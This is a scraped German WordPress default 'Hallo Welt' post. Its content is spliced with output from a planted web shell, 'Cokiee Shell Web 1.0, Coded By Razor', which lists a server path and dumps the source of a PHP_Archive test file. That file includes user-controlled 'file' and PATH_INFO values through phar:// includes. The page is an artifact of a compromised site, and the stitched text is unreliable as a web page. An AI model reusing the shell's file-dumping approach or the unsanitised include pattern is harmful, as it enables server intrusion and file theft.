Willkommen bei WordPress. Dies ist dein erster Beitrag. Bearbeite oder lösche ihn und beginne mit dem Schreiben!
Hallo Welt!
von raredesign | Dez 3, 2019 | Allgemein | 0 Kommentare
Cokiee Shell
Current Path : /usr/share/php/test/PHP_Archive/tests/planet_php/ |
Current File : //usr/share/php/test/PHP_Archive/tests/planet_php/default_phar.php |
<?php if ($_SERVER['PATH_INFO'] == '/images.php' || $_SERVER['PATH_INFO'] == '/image.php') { $file_info = pathinfo($_GET['file']); switch (strtolower($file_info['extension'])) { case 'jpg': case 'jpeg': $mimetype = 'image/jpeg'; break; case 'gif': $mimetype = 'image/gif'; break; case 'png': $mimetype = 'image/png'; break; default: exit; } header('Content-Type: ' .$mimetype); include 'phar://images/' . $_GET['file']; exit; } if (isset($_SERVER['PATH_INFO'])) { require_once 'phar:/' .$_SERVER['PATH_INFO']; } else { require_once 'phar://index.htm'; } ?>
Cokiee Shell Web 1.0, Coded By Razor
Neueste Kommentare